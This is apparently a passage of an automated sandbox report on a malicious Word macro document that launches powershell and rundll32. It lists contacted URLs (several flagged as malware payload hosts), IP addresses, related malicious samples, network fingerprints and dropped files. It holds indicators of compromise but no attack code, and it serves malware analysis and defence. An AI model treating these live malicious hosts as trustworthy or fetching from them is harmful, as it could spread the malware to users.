                                                      http://windowsmedia.com/redir/services.asp?WMPFriendly=truepowershell.exe, 00000005.00000002.2123660159.000000001D0F7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2127830169.0000000001DA7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2124541476.0000000002147000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2134936762.0000000002007000.00000002.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.hotmail.com/oepowershell.exe, 00000005.00000002.2123472940.000000001CF10000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2127555441.0000000001BC0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2124154383.0000000001F60000.00000002.00000001.sdmpfalse
                                                        high
                                                        https://mrveggy.compowershell.exe, 00000005.00000002.2120553470.0000000003BDD000.00000004.00000001.sdmptrue
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkpowershell.exe, 00000005.00000002.2123660159.000000001D0F7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2127830169.0000000001DA7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2124541476.0000000002147000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2134936762.0000000002007000.00000002.00000001.sdmpfalse
                                                          high
                                                          http://crl.godaddy.com/gdroot-g2.crl0Fpowershell.exe, 00000005.00000002.2123409820.000000001CD42000.00000004.00000001.sdmpfalse
                                                            high
                                                            http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0tpowershell.exe, 00000005.00000002.2119387476.0000000002F32000.00000004.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://crl.pkioverheid.nl/DomOvLatestCRL.crl0powershell.exe, 00000005.00000002.2121560915.000000001B556000.00000004.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://hbprivileged.com/cgi-bin/Qg/powershell.exe, 00000005.00000002.2119387476.0000000002F32000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2120461916.0000000003AAE000.00000004.00000001.sdmptrue
                                                            • Avira URL Cloud: malware
                                                            unknown
                                                            http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.powershell.exe, 00000005.00000002.2110315504.0000000002240000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2135208859.0000000002750000.00000002.00000001.sdmpfalse
                                                              high
                                                              http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervpowershell.exe, 00000005.00000002.2109740274.0000000000364000.00000004.00000020.sdmpfalse
                                                                high
                                                                http://crl.godaddy.com/gdig2s1-1814.crl0powershell.exe, 00000005.00000002.2119387476.0000000002F32000.00000004.00000001.sdmpfalse
                                                                  high
                                                                  http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#powershell.exe, 00000005.00000002.2119387476.0000000002F32000.00000004.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://www.teelekded.com/cgi-bin/LPo/Ppowershell.exe, 00000005.00000002.2119387476.0000000002F32000.00000004.00000001.sdmptrue
                                                                  • Avira URL Cloud: malware
                                                                  unknown
                                                                  https://theo.digital/wp-admin/Zyl2/powershell.exe, 00000005.00000002.2119387476.0000000002F32000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2120461916.0000000003AAE000.00000004.00000001.sdmptrue
                                                                  • Avira URL Cloud: malware
                                                                  unknown
                                                                  http://crl.godaddy.com/gdroot.crl0Fpowershell.exe, 00000005.00000003.2109481139.000000001CD42000.00000004.00000001.sdmpfalse
                                                                    high
                                                                    http://ketoresetme.compowershell.exe, 00000005.00000002.2120526836.0000000003B92000.00000004.00000001.sdmptrue
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://secure.comodo.com/CPS0powershell.exe, 00000005.00000002.2121560915.000000001B556000.00000004.00000001.sdmpfalse
                                                                      high
                                                                      http://crl.entrust.net/2048ca.crl0powershell.exe, 00000005.00000002.2121616867.000000001B565000.00000004.00000001.sdmpfalse
                                                                        high

                                                                        Contacted IPs

                                                                        • No. of IPs < 25%
                                                                        • 25% < No. of IPs < 50%
                                                                        • 50% < No. of IPs < 75%
                                                                        • 75% < No. of IPs

                                                                        Public

                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                        217.160.169.110
                                                                        unknownGermany
                                                                        8560ONEANDONE-ASBrauerstrasse48DEtrue
                                                                        51.255.203.164
                                                                        unknownFrance
                                                                        16276OVHFRtrue
                                                                        70.32.23.58
                                                                        unknownUnited States
                                                                        55293A2HOSTINGUStrue
                                                                        35.209.174.246
                                                                        unknownUnited States
                                                                        19527GOOGLE-2UStrue
                                                                        35.163.191.195
                                                                        unknownUnited States
                                                                        16509AMAZON-02UStrue
                                                                        192.124.249.8
                                                                        unknownUnited States
                                                                        30148SUCURI-SECUStrue
                                                                        51.15.7.145
                                                                        unknownFrance
                                                                        12876OnlineSASFRtrue
                                                                        177.12.170.95
                                                                        unknownBrazil
                                                                        28299IPV6InternetLtdaBRtrue
                                                                        35.209.96.32
                                                                        unknownUnited States
                                                                        19527GOOGLE-2UStrue
                                                                        84.232.229.24
                                                                        unknownRomania
                                                                        8708RCS-RDS73-75DrStaicoviciROtrue

                                                                        General Information

                                                                        Joe Sandbox Version:31.0.0 Emerald
                                                                        Analysis ID:345226
                                                                        Start date:27.01.2021
                                                                        Start time:20:57:45
                                                                        Joe Sandbox Product:CloudBasic
                                                                        Overall analysis duration:0h 7m 29s
                                                                        Hypervisor based Inspection enabled:false
                                                                        Report type:light
                                                                        Sample file name:68254_2001.doc
                                                                        Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                        Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                        Number of analysed new started processes analysed:15
                                                                        Number of new started drivers analysed:0
                                                                        Number of existing processes analysed:0
                                                                        Number of existing drivers analysed:0
                                                                        Number of injected processes analysed:0
                                                                        Technologies:
                                                                        • HCA enabled
                                                                        • EGA enabled
                                                                        • HDC enabled
                                                                        • GSI enabled (VBA)
                                                                        • AMSI enabled
                                                                        Analysis Mode:default
                                                                        Analysis stop reason:Timeout
                                                                        Detection:MAL
                                                                        Classification:mal100.troj.evad.winDOC@20/14@7/10
                                                                        EGA Information:
                                                                        • Successful, ratio: 85.7%
                                                                        HDC Information:
                                                                        • Successful, ratio: 33.6% (good quality ratio 24.1%)
                                                                        • Quality average: 58.5%
                                                                        • Quality standard deviation: 37.9%
                                                                        HCA Information:
                                                                        • Successful, ratio: 78%
                                                                        • Number of executed functions: 0
                                                                        • Number of non-executed functions: 0
                                                                        Cookbook Comments:
                                                                        • Adjust boot time
                                                                        • Enable AMSI
                                                                        • Found application associated with file extension: .doc
                                                                        • Found Word or Excel or PowerPoint or XPS Viewer
                                                                        • Found warning dialog
                                                                        • Click Ok
                                                                        • Attach to Office via COM
                                                                        • Scroll down
                                                                        • Close Viewer
                                                                        Warnings:
                                                                        Show All
                                                                        • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
                                                                        • TCP Packets have been reduced to 100
                                                                        • Excluded IPs from analysis (whitelisted): 192.35.177.64, 8.241.122.126, 8.241.123.126, 8.248.131.254, 8.253.204.120, 67.27.158.126
                                                                        • Excluded domains from analysis (whitelisted): audownload.windowsupdate.nsatc.net, apps.digsigtrust.com, ctldl.windowsupdate.com, auto.au.download.windowsupdate.com.c.footprint.net, apps.identrust.com, au-bg-shim.trafficmanager.net
                                                                        • Execution Graph export aborted for target powershell.exe, PID 2484 because it is empty
                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                        • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                        • Report size getting too big, too many NtQueryValueKey calls found.

                                                                        Simulations

                                                                        Behavior and APIs

                                                                        TimeTypeDescription
                                                                        20:58:40API Interceptor1x Sleep call for process: msg.exe modified
                                                                        20:58:41API Interceptor93x Sleep call for process: powershell.exe modified
                                                                        20:59:02API Interceptor253x Sleep call for process: rundll32.exe modified

                                                                        Joe Sandbox View / Context

                                                                        IPs

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                        217.160.169.110Arch_2021_717-1562532.docGet hashmaliciousBrowse
                                                                        • 217.160.169.110:8080/zrm2/7son14/mlqmfbi2uji6/
                                                                        51.255.203.164ARCHIVOFile-20-012021.docGet hashmaliciousBrowse
                                                                          ARCH_25_012021.docGet hashmaliciousBrowse
                                                                            ARCH_25_012021.docGet hashmaliciousBrowse
                                                                              Arch_2021_717-1562532.docGet hashmaliciousBrowse
                                                                                70.32.23.583507.docGet hashmaliciousBrowse
                                                                                • ketoresetme.com/wp-content/Rk4rz/
                                                                                Info-7114675 3084661.docGet hashmaliciousBrowse
                                                                                • ketoresetme.com/wp-content/Rk4rz/
                                                                                naamloos-526 3422702.docGet hashmaliciousBrowse
                                                                                • ketoresetme.com/wp-content/Rk4rz/
                                                                                55-2912.docGet hashmaliciousBrowse
                                                                                • ketoresetme.com/wp-content/pmJ/
                                                                                DAT_G_0259067.docGet hashmaliciousBrowse
                                                                                • ketoresetme.com/wp-content/pmJ/
                                                                                DAT_G_0259067.docGet hashmaliciousBrowse
                                                                                • ketoresetme.com/wp-content/pmJ/
                                                                                5349 TED_04235524.docGet hashmaliciousBrowse
                                                                                • ketoresetme.com/wp-content/pmJ/
                                                                                5349 TED_04235524.docGet hashmaliciousBrowse
                                                                                • ketoresetme.com/wp-content/pmJ/
                                                                                FILE_122020_VVY_591928.docGet hashmaliciousBrowse
                                                                                • ketoresetme.com/wp-content/pmJ/
                                                                                Archivo_29_48214503.docGet hashmaliciousBrowse
                                                                                • ketoresetme.com/wp-content/pmJ/
                                                                                Adjunto 29 886_473411.docGet hashmaliciousBrowse
                                                                                • ketoresetme.com/wp-content/pmJ/
                                                                                Informacion_29.docGet hashmaliciousBrowse
                                                                                • ketoresetme.com/wp-content/pmJ/
                                                                                Informacion_29.docGet hashmaliciousBrowse
                                                                                • ketoresetme.com/wp-content/pmJ/
                                                                                Informacion_122020_EUH-4262717.docGet hashmaliciousBrowse
                                                                                • ketoresetme.com/wp-content/pmJ/
                                                                                1923620_YY-5094713.docGet hashmaliciousBrowse
                                                                                • ketoresetme.com/wp-content/pmJ/
                                                                                Doc 2912 75513.docGet hashmaliciousBrowse
                                                                                • ketoresetme.com/wp-content/pmJ/

                                                                                Domains

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                ketoresetme.com3507.docGet hashmaliciousBrowse
                                                                                • 70.32.23.58
                                                                                Info-7114675 3084661.docGet hashmaliciousBrowse
                                                                                • 70.32.23.58
                                                                                naamloos-526 3422702.docGet hashmaliciousBrowse
                                                                                • 70.32.23.58
                                                                                55-2912.docGet hashmaliciousBrowse
                                                                                • 70.32.23.58
                                                                                DAT_G_0259067.docGet hashmaliciousBrowse
                                                                                • 70.32.23.58
                                                                                DAT_G_0259067.docGet hashmaliciousBrowse
                                                                                • 70.32.23.58
                                                                                5349 TED_04235524.docGet hashmaliciousBrowse
                                                                                • 70.32.23.58
                                                                                5349 TED_04235524.docGet hashmaliciousBrowse
                                                                                • 70.32.23.58
                                                                                FILE_122020_VVY_591928.docGet hashmaliciousBrowse
                                                                                • 70.32.23.58
                                                                                Archivo_29_48214503.docGet hashmaliciousBrowse
                                                                                • 70.32.23.58
                                                                                Adjunto 29 886_473411.docGet hashmaliciousBrowse
                                                                                • 70.32.23.58
                                                                                Informacion_29.docGet hashmaliciousBrowse
                                                                                • 70.32.23.58
                                                                                Informacion_29.docGet hashmaliciousBrowse
                                                                                • 70.32.23.58
                                                                                Informacion_122020_EUH-4262717.docGet hashmaliciousBrowse
                                                                                • 70.32.23.58
                                                                                1923620_YY-5094713.docGet hashmaliciousBrowse
                                                                                • 70.32.23.58
                                                                                Doc 2912 75513.docGet hashmaliciousBrowse
                                                                                • 70.32.23.58
                                                                                mrveggy.comARCHIVOFile-20-012021.docGet hashmaliciousBrowse
                                                                                • 177.12.170.95
                                                                                https://mrveggy.com/resgatecarrinho/jcWVa69vj8IDsQRCud8h6RNI9Mz17JqsPPJ0DFnlbXZGyMM2GcZ3/Get hashmaliciousBrowse
                                                                                • 177.12.170.95
                                                                                KmTYOvCPfr.docGet hashmaliciousBrowse
                                                                                • 191.6.198.191
                                                                                aersUIITZI.docGet hashmaliciousBrowse
                                                                                • 191.6.198.191
                                                                                AKnPzbr0F4.docGet hashmaliciousBrowse
                                                                                • 191.6.198.191
                                                                                dacjlB7lAk.docGet hashmaliciousBrowse
                                                                                • 191.6.198.191
                                                                                mKCRYKmKpO.docGet hashmaliciousBrowse
                                                                                • 191.6.198.191
                                                                                wcHZ0mF90J.docGet hashmaliciousBrowse
                                                                                • 191.6.198.191
                                                                                hhm95ov8un.docGet hashmaliciousBrowse
                                                                                • 191.6.198.191
                                                                                K4ziGr614R.docGet hashmaliciousBrowse
                                                                                • 191.6.198.191
                                                                                6sANi023oS.docGet hashmaliciousBrowse
                                                                                • 191.6.198.191
                                                                                bIaql64CTa.docGet hashmaliciousBrowse
                                                                                • 191.6.198.191
                                                                                Jyud0uPIRu.docGet hashmaliciousBrowse
                                                                                • 191.6.198.191
                                                                                yH7WbTpvwU.docGet hashmaliciousBrowse
                                                                                • 191.6.198.191
                                                                                p3QPprGcL9.docGet hashmaliciousBrowse
                                                                                • 191.6.198.191
                                                                                3CEenXi4tj.docGet hashmaliciousBrowse
                                                                                • 191.6.198.191
                                                                                cbdbiBCPkK.docGet hashmaliciousBrowse
                                                                                • 191.6.198.191
                                                                                2Es3D1PlTF.docGet hashmaliciousBrowse
                                                                                • 191.6.198.191
                                                                                F734Y7dkLk.docGet hashmaliciousBrowse
                                                                                • 191.6.198.191
                                                                                riK37JutrL.docGet hashmaliciousBrowse
                                                                                • 191.6.198.191
                                                                                hbprivileged.comARCHIVOFile-20-012021.docGet hashmaliciousBrowse
                                                                                • 35.209.96.32
                                                                                ARCH-SO-930373.docGet hashmaliciousBrowse
                                                                                • 35.209.96.32
                                                                                ummahstars.comDocumentaci#U00f3n.docGet hashmaliciousBrowse
                                                                                • 35.163.191.195
                                                                                ARCHIVOFile-20-012021.docGet hashmaliciousBrowse
                                                                                • 35.163.191.195
                                                                                Z8363664.docGet hashmaliciousBrowse
                                                                                • 35.163.191.195

                                                                                ASN

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                OVHFR5geQkr1GBQ.exeGet hashmaliciousBrowse
                                                                                • 87.98.185.184
                                                                                Order confirmation 64236000000025 26.01.2021.exeGet hashmaliciousBrowse
                                                                                • 51.195.43.214
                                                                                l59423.dllGet hashmaliciousBrowse
                                                                                • 158.69.118.130
                                                                                ARCHIVOFile-20-012021.docGet hashmaliciousBrowse
                                                                                • 51.255.203.164
                                                                                ARCH_25_012021.docGet hashmaliciousBrowse
                                                                                • 51.255.203.164
                                                                                Invoice-3990993.exeGet hashmaliciousBrowse
                                                                                • 66.70.204.222
                                                                                ra8tqy1c.rar.dllGet hashmaliciousBrowse
                                                                                • 158.69.118.130
                                                                                ARCH_25_012021.docGet hashmaliciousBrowse
                                                                                • 51.255.203.164
                                                                                WUHU95Apq3Get hashmaliciousBrowse
                                                                                • 46.105.5.118
                                                                                SecuriteInfo.com.ArtemisTrojan.dllGet hashmaliciousBrowse
                                                                                • 158.69.118.130
                                                                                SecuriteInfo.com.Generic.mg.59d4c719403b7938.dllGet hashmaliciousBrowse
                                                                                • 158.69.118.130
                                                                                SecuriteInfo.com.Generic.mg.9d9c1d19818e75cc.dllGet hashmaliciousBrowse
                                                                                • 158.69.118.130
                                                                                SecuriteInfo.com.ArtemisTrojan.dllGet hashmaliciousBrowse
                                                                                • 158.69.118.130
                                                                                SecuriteInfo.com.ArtemisTrojan.dllGet hashmaliciousBrowse
                                                                                • 158.69.118.130
                                                                                roboforex4multisetup.exeGet hashmaliciousBrowse
                                                                                • 139.99.148.202
                                                                                xDKOaCQQTQ.dllGet hashmaliciousBrowse
                                                                                • 158.69.118.130
                                                                                4bEUfowOcg.dllGet hashmaliciousBrowse
                                                                                • 158.69.118.130
                                                                                P_O INV 01262021.exeGet hashmaliciousBrowse
                                                                                • 51.195.53.221
                                                                                DHL doc.exeGet hashmaliciousBrowse
                                                                                • 51.195.53.221
                                                                                PL5CS6pwNitND2n.exeGet hashmaliciousBrowse
                                                                                • 51.75.130.83
                                                                                ONEANDONE-ASBrauerstrasse48DEFastClient_i_r756196528.exeGet hashmaliciousBrowse
                                                                                • 82.165.158.168
                                                                                98.docGet hashmaliciousBrowse
                                                                                • 212.227.200.73
                                                                                ARCH_25_012021.docGet hashmaliciousBrowse
                                                                                • 217.160.169.110
                                                                                ARCH_25_012021.docGet hashmaliciousBrowse
                                                                                • 217.160.169.110
                                                                                justifiI_0000445990_0009334372_1005_2555517182_30092019_E.WsFGet hashmaliciousBrowse
                                                                                • 82.223.25.82
                                                                                JUSTF2.tarGet hashmaliciousBrowse
                                                                                • 213.165.67.118
                                                                                NEW ORDER.xlsxGet hashmaliciousBrowse
                                                                                • 74.208.236.196
                                                                                file.docGet hashmaliciousBrowse
                                                                                • 212.227.200.73
                                                                                winlog(1).exeGet hashmaliciousBrowse
                                                                                • 74.208.236.196
                                                                                Quote Requirements.gz.exeGet hashmaliciousBrowse
                                                                                • 70.35.203.53
                                                                                RFQ.xlsxGet hashmaliciousBrowse
                                                                                • 70.35.203.53
                                                                                Arch_2021_717-1562532.docGet hashmaliciousBrowse
                                                                                • 217.160.169.110
                                                                                Bestellung.docGet hashmaliciousBrowse
                                                                                • 212.227.200.73
                                                                                N00048481397007.docGet hashmaliciousBrowse
                                                                                • 212.227.200.73
                                                                                N00048481397007.docGet hashmaliciousBrowse
                                                                                • 212.227.200.73
                                                                                MENSAJE.docGet hashmaliciousBrowse
                                                                                • 212.227.200.73
                                                                                MENSAJE.docGet hashmaliciousBrowse
                                                                                • 212.227.200.73
                                                                                Archivo_AB-96114571.docGet hashmaliciousBrowse
                                                                                • 212.227.200.73
                                                                                5390080_2021_1-259043.docGet hashmaliciousBrowse
                                                                                • 212.227.200.73
                                                                                5390080_2021_1-259043.docGet hashmaliciousBrowse
                                                                                • 212.227.200.73
                                                                                GOOGLE-2USIMG-11862.docGet hashmaliciousBrowse
                                                                                • 35.208.61.46
                                                                                ARCHIVOFile-20-012021.docGet hashmaliciousBrowse
                                                                                • 35.209.96.32
                                                                                Calculation-380472272-01262021.xlsmGet hashmaliciousBrowse
                                                                                • 35.208.103.169
                                                                                453690-3012-QZS-9120501.docGet hashmaliciousBrowse
                                                                                • 35.214.159.46
                                                                                MPbBCArHPF.exeGet hashmaliciousBrowse
                                                                                • 35.208.174.213
                                                                                TBKK E12101010.xlsxGet hashmaliciousBrowse
                                                                                • 35.208.174.213
                                                                                ARCH-SO-930373.docGet hashmaliciousBrowse
                                                                                • 35.209.96.32
                                                                                Info_C_780929.docGet hashmaliciousBrowse
                                                                                • 35.214.159.46
                                                                                Factura.docGet hashmaliciousBrowse
                                                                                • 35.209.114.34
                                                                                DAT 30 122020 664_16167.docGet hashmaliciousBrowse
                                                                                • 35.214.159.46
                                                                                Beauftragung.docGet hashmaliciousBrowse
                                                                                • 35.209.114.34
                                                                                sample2.docGet hashmaliciousBrowse
                                                                                • 35.214.199.246
                                                                                55-2912.docGet hashmaliciousBrowse
                                                                                • 35.209.78.196
                                                                                DAT_G_0259067.docGet hashmaliciousBrowse
                                                                                • 35.214.169.246
                                                                                DAT_G_0259067.docGet hashmaliciousBrowse
                                                                                • 35.209.78.196
                                                                                Shipping Document PL&BL Draft01.exeGet hashmaliciousBrowse
                                                                                • 35.208.179.96
                                                                                Shipping Document PL&BL Draft.exeGet hashmaliciousBrowse
                                                                                • 35.214.23.27
                                                                                SHEXD2101127S_ShippingDocument_DkD.xlsxGet hashmaliciousBrowse
                                                                                • 35.208.174.213
                                                                                YUAN PAYMENT.exeGet hashmaliciousBrowse
                                                                                • 35.208.137.4
                                                                                Invoice_20210115122010.exeGet hashmaliciousBrowse
                                                                                • 35.208.179.96
                                                                                A2HOSTINGUSOCXQZK3KWmWNdRx.exeGet hashmaliciousBrowse
                                                                                • 85.187.154.178
                                                                                Info-237-602317.docGet hashmaliciousBrowse
                                                                                • 66.198.240.46
                                                                                Info-237-602317.docGet hashmaliciousBrowse
                                                                                • 66.198.240.46
                                                                                3507.docGet hashmaliciousBrowse
                                                                                • 70.32.23.58
                                                                                Info-7114675 3084661.docGet hashmaliciousBrowse
                                                                                • 70.32.23.58
                                                                                naamloos-526 3422702.docGet hashmaliciousBrowse
                                                                                • 70.32.23.58
                                                                                55-2912.docGet hashmaliciousBrowse
                                                                                • 70.32.23.58
                                                                                DAT_G_0259067.docGet hashmaliciousBrowse
                                                                                • 70.32.23.58
                                                                                DAT_G_0259067.docGet hashmaliciousBrowse
                                                                                • 70.32.23.58
                                                                                Request for Quotation.exeGet hashmaliciousBrowse
                                                                                • 185.148.131.62
                                                                                5349 TED_04235524.docGet hashmaliciousBrowse
                                                                                • 70.32.23.58
                                                                                5349 TED_04235524.docGet hashmaliciousBrowse
                                                                                • 70.32.23.58
                                                                                FILE_122020_VVY_591928.docGet hashmaliciousBrowse
                                                                                • 70.32.23.58
                                                                                Archivo_29_48214503.docGet hashmaliciousBrowse
                                                                                • 70.32.23.58
                                                                                Adjunto 29 886_473411.docGet hashmaliciousBrowse
                                                                                • 70.32.23.58
                                                                                Informacion_29.docGet hashmaliciousBrowse
                                                                                • 70.32.23.58
                                                                                Informacion_29.docGet hashmaliciousBrowse
                                                                                • 70.32.23.58
                                                                                Informacion_122020_EUH-4262717.docGet hashmaliciousBrowse
                                                                                • 70.32.23.58
                                                                                1923620_YY-5094713.docGet hashmaliciousBrowse
                                                                                • 70.32.23.58
                                                                                Doc 2912 75513.docGet hashmaliciousBrowse
                                                                                • 70.32.23.58

                                                                                JA3 Fingerprints

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                05af1f5ca1b87cc9cc9b25185115607dOrder_130577.docGet hashmaliciousBrowse
                                                                                • 177.12.170.95
                                                                                • 35.163.191.195
                                                                                IMG-79108.docGet hashmaliciousBrowse
                                                                                • 177.12.170.95
                                                                                • 35.163.191.195
                                                                                IMG-6661.docGet hashmaliciousBrowse
                                                                                • 177.12.170.95
                                                                                • 35.163.191.195
                                                                                Documentaci#U00f3n.docGet hashmaliciousBrowse
                                                                                • 177.12.170.95
                                                                                • 35.163.191.195
                                                                                ARCHIVOFile-20-012021.docGet hashmaliciousBrowse
                                                                                • 177.12.170.95
                                                                                • 35.163.191.195
                                                                                SecuriteInfo.com.Exploit.Siggen3.8790.14645.xlsGet hashmaliciousBrowse
                                                                                • 177.12.170.95
                                                                                • 35.163.191.195
                                                                                SecuriteInfo.com.Trojan.DOC.Agent.ATB.11104.xlsGet hashmaliciousBrowse
                                                                                • 177.12.170.95
                                                                                • 35.163.191.195
                                                                                Informacion.docGet hashmaliciousBrowse
                                                                                • 177.12.170.95
                                                                                • 35.163.191.195
                                                                                PAYMENT.260121.xlsxGet hashmaliciousBrowse
                                                                                • 177.12.170.95
                                                                                • 35.163.191.195
                                                                                IMG_761213.docGet hashmaliciousBrowse
                                                                                • 177.12.170.95
                                                                                • 35.163.191.195
                                                                                IMG-51033.docGet hashmaliciousBrowse
                                                                                • 177.12.170.95
                                                                                • 35.163.191.195
                                                                                ARCH_98_24301.docGet hashmaliciousBrowse
                                                                                • 177.12.170.95
                                                                                • 35.163.191.195
                                                                                Bestellung.docGet hashmaliciousBrowse
                                                                                • 177.12.170.95
                                                                                • 35.163.191.195
                                                                                Revised-RBG-180129940.xlsxGet hashmaliciousBrowse
                                                                                • 177.12.170.95
                                                                                • 35.163.191.195
                                                                                N00048481397007.docGet hashmaliciousBrowse
                                                                                • 177.12.170.95
                                                                                • 35.163.191.195
                                                                                Order.docGet hashmaliciousBrowse
                                                                                • 177.12.170.95
                                                                                • 35.163.191.195
                                                                                SecuriteInfo.com.Heur.13954.xlsGet hashmaliciousBrowse
                                                                                • 177.12.170.95
                                                                                • 35.163.191.195
                                                                                case_3499.xlsGet hashmaliciousBrowse
                                                                                • 177.12.170.95
                                                                                • 35.163.191.195
                                                                                case.2991.xlsGet hashmaliciousBrowse
                                                                                • 177.12.170.95
                                                                                • 35.163.191.195
                                                                                N00048481397007.docGet hashmaliciousBrowse
                                                                                • 177.12.170.95
                                                                                • 35.163.191.195

                                                                                Dropped Files

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                C:\Users\user\Ocmd_ke\Qqw8nbh\A30F.dllARCHIVOFile-20-012021.docGet hashmaliciousBrowse

                                                                                  Created / dropped Files

                                                                                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:Microsoft Cabinet archive data, 59134 bytes, 1 file
                                                                                  Category:dropped
                                                                                  Size (bytes):59134
                                                                                  Entropy (8bit):7.995450161616763
                                                                                  Encrypted:true
                                                                                  SSDEEP:1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk
                                                                                  MD5:E92176B0889CC1BB97114BEB2F3C1728
                                                                                  SHA1:AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443
                                                                                  SHA-256:58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3
                                                                                  SHA-512:CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F
                                                                                  Malicious:false
                                                                                  Reputation:moderate, very likely benign file
                                                                                  Preview: MSCF............,...................I........T.........R.. .authroot.stl.ym&7.5..CK..8T....c_.d...:.(.....].M$[v.4.).E.$7*I.....e..Y..Rq...3.n..u..............|..=H....&..1.1..f.L..>e.6....F8.X.b.1$,.a...n-......D..a....[.....i,+.+..<.b._#...G..U.....n..21*pa..>.32..Y..j...;Ay........n/R... ._.+..<...Am.t.<. ..V..y`.yO..e@../...<#..#......dju*..B......8..H'..lr.....l.I6/..d.].xIX<...&U...GD..Mn.y&.[<(tk.....%B.b;./..`.#h....C.P...B..8d.F...D.k........... 0..w...@(.. @K....?.)ce........\.\......l......Q.Qd..+...@.X..##3..M.d..n6.....p1..)...x0V...ZK.{...{.=#h.v.).....b...*..[...L..*c..a..,...E5X..i.d..w.....#o*+.........X.P...k...V.$...X.r.e....9E.x..=\...Km.......B...Ep...xl@@c1.....p?...d.{EYN.K.X>D3..Z..q.] .Mq.........L.n}........+/l\.cDB0.'.Y...r.[.........vM...o.=....zK..r..l..>B....U..3....Z...ZjS...wZ.M...IW;..e.L...zC.wBtQ..&.Z.Fv+..G9.8..!..\T:K`......m.........9T.u..3h.....{...d[...@...Q.?..p.e.t[.%7..........^.....s.
                                                                                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):893
                                                                                  Entropy (8bit):7.366016576663508
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:hBntmDvKUQQDvKUr7C5fpqp8gPvXHmXvponXux:3ntmD5QQD5XC5RqHHXmXvp++x
                                                                                  MD5:D4AE187B4574036C2D76B6DF8A8C1A30
                                                                                  SHA1:B06F409FA14BAB33CBAF4A37811B8740B624D9E5
                                                                                  SHA-256:A2CE3A0FA7D2A833D1801E01EC48E35B70D84F3467CC9F8FAB370386E13879C7
                                                                                  SHA-512:1F44A360E8BB8ADA22BC5BFE001F1BABB4E72005A46BC2A94C33C4BD149FF256CCE6F35D65CA4F7FC2A5B9E15494155449830D2809C8CF218D0B9196EC646B0C
                                                                                  Malicious:false
                                                                                  Preview: 0..y..*.H.........j0..f...1.0...*.H.........N0..J0..2.......D....'..09...@k0...*.H........0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30...000930211219Z..210930140115Z0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30.."0...*.H.............0..........P..W..be......,k0.[...}.@......3vI*.?!I..N..>H.e...!.e.*.2....w..{........s.z..2..~..0....*8.y.1.P..e.Qc...a.Ka..Rk...K.(.H......>.... .[.*....p....%.tr.{j.4.0...h.{T....Z...=d.....Ap..r.&.8U9C....\@........%.......:..n.>..\..<.i....*.)W..=....]......B0@0...U.......0....0...U...........0...U.........{,q...K.u...`...0...*.H...............,...\...(f7:...?K.... ]..YD.>.>..K.t.....t..~.....K. D....}..j.....N..:.pI...........:^H...X._..Z.....Y..n......f3.Y[...sG.+..7H..VK....r2...D.SrmC.&H.Rg.X..gvqx...V..9$1....Z0G..P.......dc`........}...=2.e..|.Wv..(9..e...w.j..w.......)...55.1.
                                                                                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):328
